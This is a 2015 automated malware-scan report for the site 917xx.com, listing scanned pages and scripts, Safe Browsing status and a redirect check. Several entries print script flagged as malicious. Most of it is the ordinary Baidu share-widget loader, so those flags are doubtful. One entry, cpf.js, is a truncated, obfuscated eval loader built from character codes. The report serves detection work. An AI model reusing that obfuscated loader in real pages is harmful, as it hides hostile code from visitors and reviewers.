Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=917xx.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://917xx.com/ | 200 OK Content-Length: 1448 Content-Type: text/html | clean |
http://917xx.com/a/xieemanhua/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:06 GMT Accept-Ranges: bytes ETag: "74d15dccb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 7792 Content-Location: http://917xx.com/a/xieemanhua/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:11 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/xieemanhua/index.html | 200 OK Content-Length: 7792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
http://js.users.51.la/16560669.js | 200 OK Content-Length: 1946 Content-Type: application/x-javascript | clean |
http://917xx.com/templets/default/js/jquery-1.10.2.min.js | 200 OK Content-Length: 93107 Content-Type: application/x-javascript | clean |
http://917xx.com/templets/default/js/cpf.js | 200 OK Content-Length: 52150 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
http://917xx.com/templets/default/js/jquery.soChange-min.js | 200 OK Content-Length: 1524 Content-Type: application/x-javascript | clean |
http://917xx.com/a/manhualianzai/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:17 GMT Accept-Ranges: bytes ETag: "ff1891dccb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 8288 Content-Location: http://917xx.com/a/manhualianzai/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:12 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/index.html | 200 OK Content-Length: 8288 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
http://917xx.com/a/manhualianzai/mayiyufengmi/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:20 GMT Accept-Ranges: bytes ETag: "61e48be2cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 8565 Content-Location: http://917xx.com/a/manhualianzai/mayiyufengmi/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:22 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/mayiyufengmi/index.html | 200 OK Content-Length: 8565 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
http://917xx.com/plus/countall.php?view=yes&aid=13 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/guafusandai/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:28 GMT Accept-Ranges: bytes ETag: "8544c0e2cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 10651 Content-Location: http://917xx.com/a/manhualianzai/guafusandai/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:22 GMT X-Died: timeout at scan.pm line 1566. X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/guafusandai/index.html | 200 OK Content-Length: 10651 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
http://917xx.com/plus/countall.php?view=yes&aid=14 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/menglongYchuan/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:38 GMT Accept-Ranges: bytes ETag: "cf11ae3cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 11868 Content-Location: http://917xx.com/a/manhualianzai/menglongYchuan/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:23 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/menglongychuan/index.html | 200 OK Content-Length: 11868 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
http://917xx.com/plus/countall.php?view=yes&aid=15 | 200 OK Content-Length: 25 Content-Type: text/html | clean |
http://917xx.com/a/manhualianzai/renyugongzhuchuan/ | HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 18:36:45 GMT Accept-Ranges: bytes ETag: "cbf747e3cb49d01:a51" Server: Microsoft-IIS/6.0 Content-Length: 14174 Content-Location: http://917xx.com/a/manhualianzai/renyugongzhuchuan/index.html Content-Type: text/html Last-Modified: Mon, 16 Feb 2015 09:35:23 GMT X-Powered-By: ASP.NET | clean |
http://917xx.com/a/manhualianzai/renyugongzhuchuan/index.html | 200 OK Content-Length: 14174 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"32"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 917xx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 18:36:02 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: 917xx.com
Referer: http://www.google.com/search?q=917xx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.